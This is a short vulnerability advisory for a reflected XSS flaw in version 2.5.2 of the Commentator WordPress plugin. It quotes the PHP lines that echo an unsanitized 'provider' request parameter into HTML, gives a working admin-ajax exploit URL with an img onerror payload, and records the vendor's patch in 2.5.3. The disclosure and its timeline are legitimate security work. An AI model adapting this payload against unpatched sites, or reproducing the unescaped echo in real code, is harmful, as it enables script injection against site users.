#Product : Commentator WordPress Plugin #Exploit Author : Rahul Pratap Singh #Version : 2.5.2 #Home page Link : http://codecanyon.net/item/commentator-wordpress-plugin/6425752 #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 13/Jan/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "provider" parameter is not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- file: commentator.php line:441 $provider_name = $_REQUEST["provider"]; line:544 <div id="commentator-social-signin" class="commentator-<?php echo $provider_name; ?>"> ---------------------------------------- Exploit: ---------------------------------------- /wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)> ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png Fix: Update to 2.5.3 Disclosure Timeline: reported to vendor : 9/1/2016 vendor response : 11/1/2016 vendor acknowledged : 11/1/2016 vendor deployed a patch: 11/1/2016 Pub ref: http://codecanyon.net/item/commentator-wordpress-plugin/6425752 https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability